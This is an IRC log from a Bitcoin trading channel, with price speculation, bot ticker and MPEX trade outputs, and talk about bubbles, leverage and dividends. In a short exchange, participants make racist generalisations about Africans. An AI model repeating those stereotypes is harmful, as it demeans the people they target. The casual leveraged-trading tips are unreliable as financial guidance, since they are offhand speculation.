sucks. Feb 12 14:20:54 i wonder what the trouble is Feb 12 14:21:20 shorting something else to buy bitcoins might be best maybe, such as borrow some other type of coin using bitcoins as colalteral, and sell what you borrow to buy more bitcoins to use as more collateral etc Feb 12 14:21:48 bubbletalk Feb 12 14:22:08 knotwork that's very dangerous. Feb 12 14:22:11 that worked great with devcoins for a while but now devcoins are so crazy cheap its looking dangerous that they might go back up before you pay back the loan Feb 12 14:22:29 now instead its time to buy all those cheap devcoins to pay back the loans Feb 12 14:22:53 and maybe borrow some other coin that seems overpriced or at least not at a crazy low Feb 12 14:23:11 that pizza article made it to BBC too Feb 12 14:23:14 http://www.bbc.co.uk/news/technology-21427505 Feb 12 14:23:20 borrowing is always dangerous but particularly so for things there arent many of Feb 12 14:23:31 yup Feb 12 14:23:36 as you could end up trapped owing something that you cannot get hold of or not at decent price Feb 12 14:24:26 pizza was the first useful thing you could buy with bitoin Feb 12 14:24:27 ;;asks 29 Feb 12 14:24:29 There are currently 9937.51 bitcoins offered at or under 29.0 USD, worth 266608.244608 USD in total. Feb 12 14:27:48 ;;ticker Feb 12 14:27:48 BTCUSD ticker | Best bid: 25.31000, Best ask: 25.40000, Bid-ask spread: 0.09000, Last trade: 25.31000, 24 hour volume: 44738.61190480, 24 hour low: 23.64560, 24 hour high: 25.75000, 24 hour vwap: 24.61882 Feb 12 14:27:59 lol this is insane... just few hours ago i cashed out a bit at 24.21 Feb 12 14:28:35 nuts Feb 12 14:29:08 ;;asks 30 Feb 12 14:29:10 There are currently 17410.07 bitcoins offered at or under 30.0 USD, worth 488875.899895 USD in total. Feb 12 14:29:35 jurov i sold 200 btc's worth specifically to rebuy once price tanks back to 20. Feb 12 14:29:48 so far im losing on that idea. Feb 12 14:30:17 i have my parents lined up for buying btcs if that happens Feb 12 14:30:36 cashing out at anything less than $100 is more a daytrader thing or a desperately need the cash thing really Feb 12 14:30:38 =) Feb 12 14:30:54 knotwork: huh? Feb 12 14:30:58 tho likely by time it hits $100 that'd have to be changed to "anything less than $150" Feb 12 14:31:08 ^exactly Feb 12 14:31:19 so - BTC gets to $95 in 5 years Feb 12 14:31:30 or in 5 months Feb 12 14:31:33 dat bubble Feb 12 14:31:33 and then something goes batshit bad and BTC goes back to $.01 Feb 12 14:31:34 JWU42 daytrader as in hoping it will dip sometime so you can buy back in cheaper Feb 12 14:31:42 knotwork i was trying to play teh daytrader what can i tel lyou. Feb 12 14:31:46 you lose EVERYTHING Feb 12 14:31:55 on paper Feb 12 14:31:57 Bugpowder ikr? Feb 12 14:31:57 if it was .01 i could buy them all Feb 12 14:32:08 its fun Feb 12 14:32:13 i love bubbles Feb 12 14:32:19 reminds me of DNDN Feb 12 14:32:21 well - the only reason it goes to $.01 is that the project is effectively dead and broken Feb 12 14:32:27 all bitcoins in the world for 100k ? sure, i'll take em Feb 12 14:32:42 JWU42 100k is inconsequential irl anyway Feb 12 14:32:47 and for some those odds might be worth it Feb 12 14:33:02 it will never go to .01 Feb 12 14:33:06 mircea_popescu: for some people 100K is currently 5x their lifetime savings Feb 12 14:33:11 ;;totalbc Feb 12 14:33:11 10770225.0 Feb 12 14:33:14 maybe 1 if SHTM Feb 12 14:33:19 SHTF Feb 12 14:33:19 next time it goes toward $2 it likely wont even get there Feb 12 14:33:20 and that is a growing % of people in the US Feb 12 14:33:23 lol i'm looking up the usd/eur rate at bitstamp's bank... and usd isn't there Feb 12 14:33:32 so it's here... usd not valid anymore Feb 12 14:33:39 heh Feb 12 14:33:40 no real equity appreciation in a dozen years Feb 12 14:33:43 ya well JWU42 , some people have no business doing btc megaplays either. Feb 12 14:33:51 https://www.bitstamp.net/market/order_book/ Feb 12 14:33:58 mega is the key word there Feb 12 14:33:59 ;) Feb 12 14:34:10 indeed Feb 12 14:34:18 as the saying goes - pigs get slaughtered Feb 12 14:34:28 if 100k is 5x your life savinfgs you obviously have no place dicking around b uying internet funny moneys for 100k Feb 12 14:34:32 waiting to sell anything until $100 is, to me, piggish Feb 12 14:34:42 its looking likely now that lots of folks will think we are finally recovering to our $32 we were at back before all those hacks hit the fans Feb 12 14:34:45 true there MP Feb 12 14:35:15 so I would not be surprised to see it go to $32 shortly then think about whether to bubble or just gloat a while before continuing up Feb 12 14:35:36 I thought we would stop at 20 Feb 12 14:35:54 i think many people are psychologically invested in passing the bubble Feb 12 14:35:55 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Feb 12 14:36:02 still favorable Feb 12 14:36:08 (by whether to bubble I mean whether to shoot on up more, not whether to "burst") Feb 12 14:36:09 so 30-35 is more a reasonable next plateau i guess Feb 12 14:36:32 I think there are more and more people putting a portion of the their weekly paycheck into BTC Feb 12 14:36:42 I am selling about 5% at these levels Feb 12 14:36:51 propping it up higher and higher Feb 12 14:36:57 BTC prices have reached what looks like a permanently high plateau. I do not feel there will be soon if ever a 50 or 60 point break from present levels, such as (bears) have predicted. I expect to see the BTC market a good deal higher within a few months. Feb 12 14:37:00 there, i jinxed it. Feb 12 14:37:04 yes I think so, if it keeps shooting up as fast when it passes $32 I'll start to think its likely to burst back down to $25 to 32 range Feb 12 14:37:42 http://www.gold-eagle.com/editorials_01/seymour062001.html there's more famous quotes. Feb 12 14:38:54 seems likely at $32 people will worry that higher might be "just a bubble", and of course some folk will be already thinking it *is* a bubble, so likely should slow the climb around there Feb 12 14:39:27 just the fact that we're noting $32 means it's obv people will get skittish at that point Feb 12 14:39:32 nah Feb 12 14:39:45 this move will violently reverse Feb 12 14:39:51 at some point Feb 12 14:39:51 yeah its a famous high imaged to have been a bubble Feb 12 14:39:59 retrace 25-50% Feb 12 14:40:07 bounce Feb 12 14:40:11 resettle Feb 12 14:40:18 Bugpowder there's not really that much btc on the market. Feb 12 14:40:24 who knows how high Feb 12 14:40:25 your modelling assumes 50-70% of btc moves. Feb 12 14:40:36 the reality is closer to 5-7%. certainly under 1/4 Feb 12 14:40:38 I dont think $32 was really a bubble at all but saying it was plus all the hacks forced it into being one, self fulfilling prophecy Feb 12 14:41:01 I thought $32 was just people realising the potential and pricing it in Feb 12 14:41:11 There will be a lot of BTC on the market when the price falls 20% and stays down for more than an hour. Feb 12 14:41:14 waterfalllll Feb 12 14:41:15 this is why price moves so much : fiat side can increase 1000% in two weeks on account of very small basis (in fiat terms) Feb 12 14:41:20 jurov: https://twitter.com/Bitstamp/status/300947007957237760 Feb 12 14:41:24 btc side can only move very little to absorb that Feb 12 14:41:28 so price compensates. Feb 12 14:41:30 ever since I have figured it is fundamentally worth more than $32 or at least $32 Feb 12 14:41:40 to think otherwise is classic bubble delishion Feb 12 14:41:45 and no, either side. people don't sell. Feb 12 14:41:45 delusion Feb 12 14:41:49 perhaps. Feb 12 14:41:53 pigeons i know, but i'm doing withdrawal not deposit Feb 12 14:42:25 if i don't receive it in 2 days i'll let you know Feb 12 14:42:29 ima write this up, brb Feb 12 14:42:33 and cross another exchange out of my list Feb 12 14:42:42 if it falls 20% and stays down more than an hour people will be running to get more bucks to exhcanges to buy those cheap coins Feb 12 14:43:26 i dont think people are as liquid as that Feb 12 14:43:36 "running to get more bucks" Feb 12 14:43:37 i'm considering to use this panic to sell bitstamp usd codes :D Feb 12 14:43:43 if that happens Feb 12 14:46:30 or i'll go by car to slovenia to deposit first lol Feb 12 14:47:07 hmm Feb 12 14:47:20 want to buy bitstamp code? Feb 12 14:47:50 not atm, just phantasizing Feb 12 14:48:19 over my after-good-lunch coffee Feb 12 14:49:34 maybe there is money to be made here Feb 12 14:49:46 i have my deposits processed same day if im early enough Feb 12 14:49:47 kakobreklaa, you have a clue why unicredit bank has no usd rate published? Feb 12 14:49:57 no clue Feb 12 14:50:02 i never checked it there Feb 12 14:50:13 http://www.unicreditbank.si/tecajna_lista/?t=1&id_menu=&language=ENG Feb 12 14:50:16 its not too far from what google will say regarding eur usd ratio Feb 12 14:50:35 lol Feb 12 14:50:36 silly Feb 12 14:50:37 i know, just i tried to find it for like 15 seconds in vain Feb 12 14:50:44 wow it dipped below $25, buy buy buy! :) Feb 12 14:51:02 the bubble is over! it's going to .02 Feb 12 14:51:41 ;;ticker Feb 12 14:51:42 BTCUSD ticker | Best bid: 24.97000, Best ask: 25.07000, Bid-ask spread: 0.10000, Last trade: 25.07000, 24 hour volume: 47520.26271140, 24 hour low: 23.64560, 24 hour high: 25.75000, 24 hour vwap: 24.64565 Feb 12 14:52:19 perhaps market got aware that mp is cashing out Feb 12 14:52:21 :D Feb 12 14:52:30 mp is cashing out!? Feb 12 14:52:37 is it april 1st? Feb 12 14:52:59 [13:29] jurov i sold 200 btc's worth specifically to rebuy once price tanks back to 20. Feb 12 14:53:01 [13:29] so far im losing on that idea. Feb 12 14:53:21 impossibru! Feb 12 14:53:23 heh, its gonna hit 30 Feb 12 14:53:28 promise Feb 12 14:53:34 too much money still flowing in Feb 12 14:53:41 it's like bernanke saying he'll change 2k usd to euros. market would panic. Feb 12 14:53:41 finally all the MP-haters can strike back, just keep buying to prevent it ever going down to 20! Feb 12 14:54:01 lol Feb 12 14:54:16 mircea_popescu: HAHA YOU FUCKED UP FINALLY. j/k :P Feb 12 14:54:17 yeah nice psywar move MP Feb 12 14:54:46 what can i say, i don't shit gold Feb 12 14:54:55 damn it, why not Feb 12 14:55:11 hahaha made MP miss out on $1000 by making hs remaining holdngs go up 20+ percent hahaha Feb 12 14:55:13 why would he waste his time thinking about such a paltry sum as 200 btc? Feb 12 14:55:36 is this even a serious conversation? lol Feb 12 14:56:13 ok time to get serious, we're making Ukto sick Feb 12 14:56:54 i was not serious (just to stay clear) Feb 12 14:57:26 i'm usually about half-serious/half-joking as a hedge Feb 12 14:58:06 humour hedging? what did the world came to Feb 12 14:58:17 pigeons: wanna trade options on humor? Feb 12 14:58:27 what will be next? drama futures? Feb 12 14:58:38 dont we already have that? Feb 12 14:58:41 well i used to joke on margin, that didn't turn out well Feb 12 14:58:56 afk Feb 12 14:59:01 Ukto, let's create me CoinBr.Drama-E and CoinBr.Drama-E on bf Feb 12 14:59:12 *CoinBr.Drama-O Feb 12 15:20:28 ;;later tell bugpowder here you go : http://trilema.com/2013/bitcoin-prices-bitcoin-inflexibility/ Feb 12 15:20:29 The operation succeeded. Feb 12 15:21:24 dude don't tell me my 200 btc comment crashed it ?! Feb 12 15:21:38 you ppl gotta stop listening to me srsly. Feb 12 15:22:49 :D Feb 12 15:22:59 mircea_popescu: url Feb 12 15:23:45 wao hm ? Feb 12 15:23:57 for your 200 btc comment o_O Feb 12 15:24:09 its in the log above neh ? Feb 12 15:25:51 did you break IRC with your inflammatory comments? Feb 12 15:27:55 i ruined everything!!1 Feb 12 15:27:56 " Two billion dollars divided by 600`000 Bitcoins comes to three thousand dollars and chance per Bitcoin." --> s/chance/change/ ??? Feb 12 15:28:03 oty Feb 12 15:29:42 "Neutral and unengaded governments win" --> s/unengaded/unengaged/ ??? Feb 12 15:31:41 "forget all about the Youkon gold rush sometime" --> s/Youcon/Yukon/ ??? Or is you con a deliberate pun? Feb 12 15:32:10 oops I meant s/Youkon/Yukon/ Feb 12 15:34:12 hehe the youkon is a joke ya Feb 12 15:36:30 where are these atrocious spelling and grammar mistakes coming from? Feb 12 15:37:16 mircea_popescu: probably your site, you gotta start proofreading. :) Feb 12 15:38:47 unengaded = unengaged? Feb 12 15:41:27 oops, didn't see it had been mentioned - apologies. Feb 12 15:55:07 africans could actually use this, cos most of them are landless, addressesless. Course the don't have any money either. Feb 12 16:00:48 ahahahahahahahha. they kicked all the whites out and 5 years later they are starving. Feb 12 16:00:59 they can't manage their resources Feb 12 16:01:12 >yukon gold Feb 12 16:01:18 mmm potatoes Feb 12 16:01:56 >every1 Feb 12 16:01:58 >stupid Feb 12 16:02:02 truffles is an african Feb 12 16:02:08 no way, my step brother is south african. he has a great business. Feb 12 16:02:17 DeadWeasel: but is he black? Feb 12 16:02:24 sorry, brother in law, i'm a little retarded today myself. Feb 12 16:02:27 nope. Feb 12 16:02:37 but he's south african. Feb 12 16:02:38 I can think of at least two south africans who made it big... but they're white Feb 12 16:03:12 i'll ask next time I see him. Feb 12 16:04:34 they have no resources to manage Feb 12 16:05:31 mining? oil? businesses owned by white men. Feb 12 16:05:38 and the coffee industry is also ran by white men Feb 12 16:05:58 I dont blame for most of africa hating people just because they're white Feb 12 16:06:14 they see the color of your skin and know you're evil because thats all they've ever seen Feb 12 16:07:03 DeadWeasel i crowdsource proofreading :D Feb 12 16:07:05 colonial powers ARE white Feb 12 16:08:01 Japan was a colonial power Feb 12 16:09:17 japan was an imperial power Feb 12 16:09:24 THEY had colonies Feb 12 16:10:16 costa rica is a colonial power Feb 12 16:10:18 it has colones Feb 12 16:20:09 he is just a tech Feb 12 16:20:20 good luck with that Feb 12 16:21:08 anyone selling any asicminer shares? Feb 12 16:21:17 transfer them to my email adress? Feb 12 16:22:47 i imagine the pain and horror of unwinding all these asicminer assignment transactions will create the profession of btclawyer Feb 12 16:23:14 i know :/ Feb 12 16:23:19 its a bit risky Feb 12 16:23:35 but i need to feed my fams Feb 12 16:24:01 hey, nothing wrong with having that profession around Feb 12 16:24:15 i was trying to push for it with the rota, but as long as it gets made somehow it's all good. Feb 12 16:24:21 i would actually pay for that service atm Feb 12 16:24:34 i made a donation to bitcoin-legal.org before Feb 12 16:24:38 could be good Feb 12 16:25:00 bithub, what would you use a bitlawyer for now? Feb 12 16:25:25 just to help me in relation to australian small business law Feb 12 16:26:11 in terms of licences, staying legal, AML and AT compliyant etc Feb 12 16:26:29 company structure Feb 12 16:27:13 Well if anyone has a recommendation for a US based CPA that gets bitcoin and can issue recommendations, I am all ears. Feb 12 16:28:15 Bugpowdurr possibly smickles once he gets his reg Feb 12 16:28:28 heh Feb 12 16:28:47 Probably going for someone more established Feb 12 16:32:03 it'd be pretty cool if some big name cpa started taking btc Feb 12 16:32:10 much more important than wikipedia/worpress/whatnot Feb 12 16:33:41 must be doable to outsource a cpa somewhere and pay them in btc Feb 12 16:33:48 same with a lawyer Feb 12 16:33:49 http://translate.google.com/translate?sl=la&tl=en&js=n&prev=_t&hl=en&ie=UTF-8&eotf=1&u=http%3A%2F%2Fwww.loremipsum.net%2F Feb 12 16:34:03 these are probably things the bitcoin foundation should be working on Feb 12 16:34:24 I just got offered a permenent position at my contract job. Feb 12 16:34:27 wooooo forme. Feb 12 16:34:40 and I spent most of my time talking on here and looking at bitcointalk. Feb 12 16:34:48 DeadWeasel: its a trap Feb 12 16:34:56 i know it is pigeons Feb 12 16:35:09 but this is a right to work state and I can leave anytime. Feb 12 16:35:38 interesting what right to work ends up meaning Feb 12 16:39:29 http://newyork.craigslist.org/mnh/acc/3604579148.html loller Feb 12 16:40:30 not the worst idea... Feb 12 16:40:47 (for the scammer) Feb 12 16:42:33 "I actually recommended a disabled guy with a limited government social income to use some of his last savings to buy 3 units from this guy." Feb 12 16:42:43 the stuff btcrtalk people do ... Feb 12 16:43:23 it's unconscionable. the badmouth mpex on the grounds of it being too good for them and saying so, Feb 12 16:43:38 they push disabled people into sending their last savings to scammers. Feb 12 16:43:44 it's a wonder that thing doesn't explode already. Feb 12 16:44:18 i use an ssh tunnel into my home machine through PUtty, and use IRSSI, it looks like a data sync. Feb 12 16:44:35 I have several command windows open and this one just blends in Feb 12 16:45:00 plus I use screen and can switch this one to another command window doing something legit Feb 12 16:46:27 ctrl-a, ctrl-a, the boss is coming Feb 12 16:57:29 they are welcome to. Feb 12 16:57:55 I have delays where I"m waiting for builds or loaders, so I do as I please. Feb 12 16:59:57 where is the new drama Feb 12 17:05:57 ;;slap jcpham Feb 12 17:06:01 there it is. Feb 12 17:12:46 ;;ticker Feb 12 17:12:47 BTCUSD ticker | Best bid: 25.32002, Best ask: 25.40000, Bid-ask spread: 0.07998, Last trade: 25.32001, 24 hour volume: 51237.14840373, 24 hour low: 23.67740, 24 hour high: 25.75000, 24 hour vwap: 24.74607 Feb 12 17:13:59 ;;bc,24hprc Feb 12 17:14:00 24.71 Feb 12 17:22:22 Im going to see how much it costs to start an LLC in Maine Feb 12 17:22:27 its probably more than I have, though Feb 12 17:22:39 400? Feb 12 17:25:14 should be like a hundred or w/e Feb 12 17:37:41 xrp? Feb 12 17:38:10 d3 why? Feb 12 17:44:17 why what? Feb 12 17:47:12 Diablo-D3: $85 Feb 12 17:47:19 also, why maine of all places Feb 12 17:47:29 because maine needs the money the most of all places Feb 12 17:47:50 its also better to register in the state that you have your physical assets in Feb 12 17:47:56 makes it easier to make the state go your way Feb 12 17:48:27 prolly vice versa as well Feb 12 17:48:52 maine also has very cheap very cold land Feb 12 17:50:19 why do you need a llc d3? Feb 12 17:50:37 to limit his liability Feb 12 17:50:45 glbse should have made a llc, but many other btc operations, but you dont just make one cuz... Feb 12 17:51:01 Chaang-Noi: because thats the norm for technology startups Feb 12 17:51:07 liabibility to what is what im trying to ask pigeons Feb 12 17:51:18 d3 do you have a tech start up? Feb 12 17:51:58 you know I do Feb 12 17:53:00 i thought your company was dead? Feb 12 17:53:19 iv not been around Feb 12 17:53:25 is it back alive? Feb 12 17:55:25 Chaang-Noi: it never died Feb 12 17:55:31 Im just cleaning up the mess nefario caused Feb 12 17:55:39 ok Feb 12 17:55:54 its taking longer than I wished, but the sooner all of this gets going the better Feb 12 17:56:13 ok Feb 12 17:56:20 best of luck Feb 12 18:07:36 ;;ticker Feb 12 18:07:37 BTCUSD ticker | Best bid: 25.41225, Best ask: 25.45500, Bid-ask spread: 0.04275, Last trade: 25.41225, 24 hour volume: 51819.99065886, 24 hour low: 23.67740, 24 hour high: 25.75000, 24 hour vwap: 24.77514 Feb 12 18:36:38 1 BTC = 25.31971 U.S. dollars = 18.8418738 Euros Feb 12 18:38:39 takes a lot of $$$ to move the market now Feb 12 18:38:44 not a lot of BTC though Feb 12 18:51:46 so.. i figure ppl in here understand foreign currencies pretty well also, so i'll ask here.. why is the yen moving now? Feb 12 19:00:11 you know a lot about africans Feb 12 19:02:06 iz, Nuke Test Feb 12 19:02:37 maybe Feb 12 19:04:17 abe told BOJ to print yen to boost their stock market I had read. Feb 12 19:04:45 bugpowder, you should start a tea company. BudPowder tea. with different bugpowder flavors Feb 12 19:04:46 check zero hedge for moar Feb 12 19:05:48 byebye 25.60 Feb 12 19:05:59 it was happening before the nuke test Feb 12 19:06:51 where is the assbot Feb 12 19:07:30 ;;ticker Feb 12 19:07:31 BTCUSD ticker | Best bid: 25.60888, Best ask: 25.64999, Bid-ask spread: 0.04111, Last trade: 25.65000, 24 hour volume: 55047.39682831, 24 hour low: 23.84590, 24 hour high: 25.75000, 24 hour vwap: 24.85482 Feb 12 19:07:33 YAH! Feb 12 19:07:44 assbot is back! Feb 12 19:07:51 !ticker m s.mpoe Feb 12 19:07:52 [MPEX:S.MPOE] 1D: 0.00062608 / 0.00064414 / 0.00066029 (2741845 shares, 1,766.15 BTC), 7D: 0.0006153 / 0.00066649 / 0.0007 (21474701 shares, 14,312.79 BTC), 30D: 0.00059445 / 0.00066292 / 0.0007 (75430667 shares, 50,004.63 BTC) Feb 12 19:07:53 [MPEX] [S.MPOE] 6450 @ 0.0006556 = 4.2286 BTC [-] Feb 12 19:10:41 Is there any chance of Obsi making some kind of magical payback? Any news on him? Feb 12 19:11:54 The pope lutheran? Feb 12 19:16:05 !ticker m s.dice Feb 12 19:16:06 [MPEX:S.DICE] 1D: 0.00598091 / 0.00608437 / 0.00620694 (7895 shares, 48.04 BTC), 7D: 0.004321 / 0.00608305 / 0.00689996 (3348531 shares, 20,369.28 BTC), 30D: 0.00085848 / 0.00557377 / 0.0075 (8343729 shares, 46,506.07 BTC) Feb 12 19:17:45 [MPEX] [S.MPOE] 4750 @ 0.0006556 = 3.1141 BTC [-] Feb 12 19:17:47 [MPEX] [S.MPOE] 14024 @ 0.00065566 = 9.195 BTC [+] Feb 12 19:20:58 [MPEX] [S.MPOE] 5530 @ 0.00065343 = 3.6135 BTC [-] Feb 12 19:22:26 [MPEX] [S.MPOE] 9376 @ 0.00065343 = 6.1266 BTC [-] Feb 12 19:22:28 [MPEX] [S.MPOE] 4026 @ 0.00065566 = 2.6397 BTC [+] Feb 12 19:22:36 [MPEX] [S.MPOE] 7040 @ 0.00066029 = 4.6484 BTC [+] Feb 12 19:22:38 [MPEX] [S.MPOE] 3708 @ 0.0006604 = 2.4488 BTC [+] Feb 12 19:26:29 yeah Feb 12 19:26:33 S.MPOE up to .00066 Feb 12 19:37:45 lets hope so Feb 12 19:38:01 lets hope it remains stable Feb 12 19:38:12 drastic spikes will all but certainly lead to drastic drops Feb 12 19:39:07 [MPEX] [S.MPOE] 7989 @ 0.00064622 = 5.1627 BTC [-] Feb 12 19:39:09 [MPEX] [S.MPOE] 13200 @ 0.00064551 = 8.5207 BTC [-] Feb 12 19:39:12 [MPEX] [S.MPOE] 20897 @ 0.00065178 = 13.6202 BTC [+] Feb 12 19:39:14 [MPEX] [S.MPOE] 4357 @ 0.00063748 = 2.7775 BTC [-] Feb 12 19:43:12 yeah Feb 12 19:43:18 volatility is great! Feb 12 19:48:30 [MPEX] [S.MPOE] 14800 @ 0.00065069 = 9.6302 BTC [+] Feb 12 19:59:51 [MPEX] [S.DICE] 1700 @ 0.00620694 = 10.5518 BTC [+] Feb 12 19:59:53 [MPEX] [S.DICE] 1000 @ 0.00624361 = 6.2436 BTC [+] Feb 12 19:59:55 [MPEX] [S.DICE] 500 @ 0.00624362 = 3.1218 BTC [+] Feb 12 19:59:56 [MPEX] [S.DICE] 10000 @ 0.0063 = 63 BTC [+] Feb 12 20:00:01 [MPEX] [S.DICE] 500 @ 0.00635293 = 3.1765 BTC [+] Feb 12 20:00:03 [MPEX] [S.DICE] 500 @ 0.0063999 = 3.2 BTC [+] Feb 12 20:00:04 [MPEX] [S.DICE] 4000 @ 0.0063999 = 25.5996 BTC [+] Feb 12 20:00:06 [MPEX] [S.DICE] 3800 @ 0.0064 = 24.32 BTC [+] Feb 12 20:00:56 [MPEX] [S.MPOE] 4321 @ 0.00065037 = 2.8102 BTC [-] Feb 12 20:01:00 [MPEX] [S.MPOE] 5879 @ 0.00065046 = 3.8241 BTC [+] Feb 12 20:02:41 [MPEX] [S.BBET] 500 @ 0.00194985 = 0.9749 BTC [+] Feb 12 20:02:43 [MPEX] [S.BBET] 500 @ 0.00194986 = 0.9749 BTC [+] Feb 12 20:02:44 [MPEX] [S.BBET] 2300 @ 0.00195 = 4.485 BTC [+] Feb 12 20:03:05 EskimoBob, then why people were again and again sticking to use hyperinflating currencies to do payments irl? Feb 12 20:03:18 for fuch sake Feb 12 20:03:24 S.BBET for .00195 Feb 12 20:03:28 are people insane? Feb 12 20:03:54 bitcoin is nowhere near such volatility Feb 12 20:04:33 ;;calc https://www.google.com/search?client=safari&rls=en&q=2/3000000/.00195&ie=UTF-8&oe=UTF-8 Feb 12 20:04:33 Error: invalid syntax (, line 1) Feb 12 20:04:36 Bugpowdurr: people said the same thing when S.MPOE hit .00015 Feb 12 20:04:54 ;;calc 2/3000000/.00195 Feb 12 20:04:54 0.00034188034188 Feb 12 20:05:03 0.03% dividend Feb 12 20:05:09 noice Feb 12 20:05:16 lol, its been like 1 month man. Feb 12 20:05:30 I guess I should have not sold :-P Feb 12 20:05:43 look at it this way, it wasn't a loss, and they covered the additional expenses, and STILL paid a ~2 BTC dividend Feb 12 20:05:56 in less then 1 month Feb 12 20:06:10 ppl expect it to have similar revenue to sdice soon Feb 12 20:06:18 ppl are idiots Feb 12 20:06:25 there is zero chance of that happening Feb 12 20:06:33 unless S.DICE shuts down Feb 12 20:06:37 IPO was on Jan 11 Feb 12 20:06:40 why not? Feb 12 20:06:50 zero chance is a bit extreme Feb 12 20:06:55 well Feb 12 20:06:57 it is a betting site after all Feb 12 20:06:57 S.DICE IPO was on Aug. 24 Feb 12 20:07:03 I also think S.DICE is overvalued ATM too Feb 12 20:07:18 probably looking at 4000 BTC / mo Feb 12 20:07:21 from here Feb 12 20:07:25 but Feb 12 20:07:35 hey, growth could occur. Feb 12 20:07:50 even with 4k/month sdice divs would be attractive Feb 12 20:08:22 ;;calc 4000/100000000/.0064 Feb 12 20:08:22 0.00625 Feb 12 20:08:45 0.6% on something that could get DoJ'd? Feb 12 20:08:56 ;;calc 0.00625*12 Feb 12 20:08:56 0.075 Feb 12 20:09:25 7.5% yearly... and how exactly it will get DoJ'd? Feb 12 20:09:48 ^ Feb 12 20:10:04 Erik gets charged. Feb 12 20:10:05 you mean domain seizure? like it worket in TPB's case? Feb 12 20:10:16 spooks the market Feb 12 20:10:19 [MPEX] [S.MPOE] 4321 @ 0.00064847 = 2.802 BTC [-] Feb 12 20:10:20 last i checked tpb is alive and kicking Feb 12 20:10:21 panic sell Feb 12 20:10:21 [MPEX] [S.MPOE] 6879 @ 0.00064844 = 4.4606 BTC [-] Feb 12 20:10:29 down to .001 Feb 12 20:10:41 that's how I imagine it might go. Feb 12 20:10:43 Bugpowdurr then you'll stop bitching about the price i hope Feb 12 20:10:48 lol Feb 12 20:10:48 hehe Feb 12 20:10:48 [MPEX] [S.DICE] 240 @ 0.006 = 1.44 BTC [-] Feb 12 20:11:10 Can you tell I sold all my S.BBET and S.DICE :) Feb 12 20:14:16 gigavps: http://i.imgur.com/iltirS0.png fan finally died Feb 12 20:14:18 I think any DOJ scenario is a ways off Feb 12 20:14:33 They take their time investigating Feb 12 20:14:48 however, Erik really should sell S.DICE well beforehand Feb 12 20:15:11 I agree its a ways off Feb 12 20:15:14 sell it at 0.008 to some gaming concern in Gibraltar or Macau Feb 12 20:15:21 yeah Feb 12 20:16:00 .008 seems low Feb 12 20:16:02 .2 Feb 12 20:16:11 ;;calc .008*87000000*25 Feb 12 20:16:11 17400000 Feb 12 20:16:29 20mil Feb 12 20:16:35 yeah Feb 12 20:16:35 (usd) Feb 12 20:16:37 uhhh Feb 12 20:16:44 I'd take that deal Feb 12 20:16:44 Is there any chance of Obsi making some kind of magical payback? Any news on him? << nope. Feb 12 20:17:03 I think 17.4M would be a fair price Feb 12 20:17:08 (USD) Feb 12 20:17:25 fuck, why is my phone so hot and slowly charging? oh, left mtgoxlive open :/ Feb 12 20:17:43 Great way for a big gaming co to get a quick presence in bitcoinland Feb 12 20:18:02 maximian the thing is, once one of them figuresd it out, all do Feb 12 20:18:10 so the only way is either it be ignored or else bidwar. Feb 12 20:18:16 [MPEX] [S.MPOE] 6021 @ 0.00064844 = 3.9043 BTC [-] Feb 12 20:18:17 if there's a bidwar anything under 100mn is a joke. Feb 12 20:18:17 [MPEX] [S.MPOE] 5373 @ 0.00063749 = 3.4252 BTC [-] Feb 12 20:18:18 [MPEX] [S.MPOE] 28093 @ 0.00063748 = 17.9087 BTC [-] Feb 12 20:18:20 [MPEX] [S.MPOE] 4103 @ 0.00063683 = 2.6129 BTC [-] Feb 12 20:18:22 [MPEX] [S.MPOE] 24610 @ 0.00063606 = 15.6534 BTC [-] Feb 12 20:18:31 possibly Feb 12 20:19:01 I wonder if evoorhees has put any thought into it Feb 12 20:21:29 [MPEX] [S.MPOE] 4321 @ 0.0006503 = 2.8099 BTC [+] Feb 12 20:21:31 [MPEX] [S.MPOE] 16718 @ 0.00065046 = 10.8744 BTC [+] Feb 12 20:32:27 [MPEX] [S.MPOE] 4321 @ 0.00065034 = 2.8101 BTC [-] Feb 12 20:32:28 [MPEX] [S.MPOE] 1407 @ 0.00065046 = 0.9152 BTC [+] Feb 12 20:36:54 [MPEX] [S.MPOE] 3950 @ 0.0006473 = 2.5568 BTC [-] Feb 12 20:36:56 [MPEX] [S.MPOE] 4321 @ 0.00064009 = 2.7658 BTC [-] Feb 12 20:36:57 [MPEX] [S.MPOE] 11664 @ 0.00064008 = 7.4659 BTC [-] Feb 12 20:36:59 [MPEX] [S.MPOE] 13301 @ 0.00063606 = 8.4602 BTC [-] Feb 12 20:42:41 jcpham :( Feb 12 20:43:02 time for warranty replacement Feb 12 20:43:46 So far this month, S.DICE has earned 6644 BTC as far as I can tell by dooglus' reports, which would imply ~16K profit for the month… does that seem right? Feb 12 20:44:21 why would it imply 16k ? Feb 12 20:44:30 just a simple projection Feb 12 20:44:42 a Feb 12 20:45:08 too spikey tho. it can go +x thousand in one day Feb 12 20:45:16 or wallow for however long Feb 12 20:45:19 yeah Feb 12 20:45:39 most of last month's revenue came really late in the month Feb 12 20:46:05 is there a transaction fee to trading on mpex? Feb 12 20:46:05 ya but that was ny Feb 12 20:46:05 [MPEX] [S.MPOE] 4321 @ 0.0006416 = 2.7724 BTC [+] Feb 12 20:46:06 [MPEX] [S.MPOE] 8300 @ 0.00064154 = 5.3248 BTC [-] Feb 12 20:46:07 [MPEX] [S.MPOE] 4139 @ 0.00063606 = 2.6327 BTC [-] Feb 12 20:46:13 o no, wait, im thinking of the other month Feb 12 20:46:15 [MPEX] [S.MPOE] 407 @ 0.00063526 = 0.2586 BTC [-] Feb 12 20:46:16 [MPEX] [S.MPOE] 10933 @ 0.0006352 = 6.9446 BTC [-] Feb 12 20:46:23 Pucilowski 0.2% seller side. Feb 12 20:46:34 i see, thanks Feb 12 20:50:08 maximian, it implies 9k for the month Feb 12 20:55:31 [MPEX] [S.MPOE] 4321 @ 0.00063723 = 2.7535 BTC [+] Feb 12 20:55:33 [MPEX] [S.MPOE] 11936 @ 0.00063693 = 7.6024 BTC [-] Feb 12 20:56:02 how did yo ufigure 9k ? Feb 12 20:58:58 more like 16k Feb 12 20:59:44 but like you said, it could stay flat from here Feb 12 20:59:50 nope. it's 120k Feb 12 20:59:54 ? Feb 12 20:59:59 sdice profit? Feb 12 20:59:59 just joking Feb 12 21:00:04 ah Feb 12 21:00:05 [MPEX] [S.MPOE] 3861 @ 0.00063693 = 2.4592 BTC [-] Feb 12 21:00:05 [MPEX] [S.MPOE] 8889 @ 0.0006352 = 5.6463 BTC [-] 